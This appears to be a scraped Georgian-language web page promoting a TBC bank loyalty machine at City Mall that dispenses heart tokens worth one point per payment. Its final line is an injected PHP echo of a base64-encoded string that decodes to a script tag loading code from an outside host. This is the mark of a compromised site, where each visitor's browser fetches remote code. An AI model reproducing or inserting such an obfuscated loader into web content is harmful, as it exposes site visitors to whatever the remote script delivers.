celsiusi
ავერსი საქკაბელი

 საახალწლო საყიდლებზე რომ გახვალ და მაღაზიების შემოვლის მარათონში ჩაერთვები, არ დაგავიწყდეს, რომ 26 დეკემბრიდან, სითი მოლის LG სართულზე ერთგულებით სავსე აპარატი დაგხვდება.

წინასაახალწლოდ, უფრო მეტი ერთგული ქულა რომ დააგროვო, თიბისიმ კიდევ ერთი სახალისო აქტივობა მოგიმზადა.

გადაიხადე თიბისის ნებისმიერი ბარათით ან ელექტრონული საფულით ერთგულებით სავსე ტერმინალზე და დააგროვე ერთგული ქულები მარტივად, რადგან აპარატიდან ჩამოვარდნილი 1 გული = 1 ქულას.

ეს კი, იმას ნიშნავს, რომ შეგიძლია ფერადი გული საჩუქრად ხელს გააყოლო და სანამ ამ პატარა საჩუქრით გულს იჯერებ, დახარჯული 1 ლარი, უკან 1 ერთგული ქულის სახით დაგიბრუნდება.

დღის მანძილზე შეგიძლია, ერთგულებით სავსე აპარატს მაქსიმუმ 5ჯერ ესტუმრო და 5 გულით სავსემ გააგრძელო ახალი წლისთვის მზადება.

თუ დაგაინტერესებს, რამდენი ფერადი გული შეგიგროვდა, გულზე QR კოდია გამოსახული და მისი დასკანერებით შენს ციფრულ ბანკში მოხვდები. იქ ქულების დათვლის გარდა, შეგიძლია, შეამოწმო, ერთგულის ლოიალობის პროგრამის რომელ ეტაპზე ხარ და კიდევ რამდენი გადახდა დაგრჩა იმისთვის, რომ ახალ ეტაპზე გადახვიდე.

გახსოვდეს, რომ დაგროვილი ქულები შეგიძლია გამოიყენო, როცა მოგესურვება და დახარჯო ერთგულის 300-ზე მეტ პარტნიორ ობიექტში.

189
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");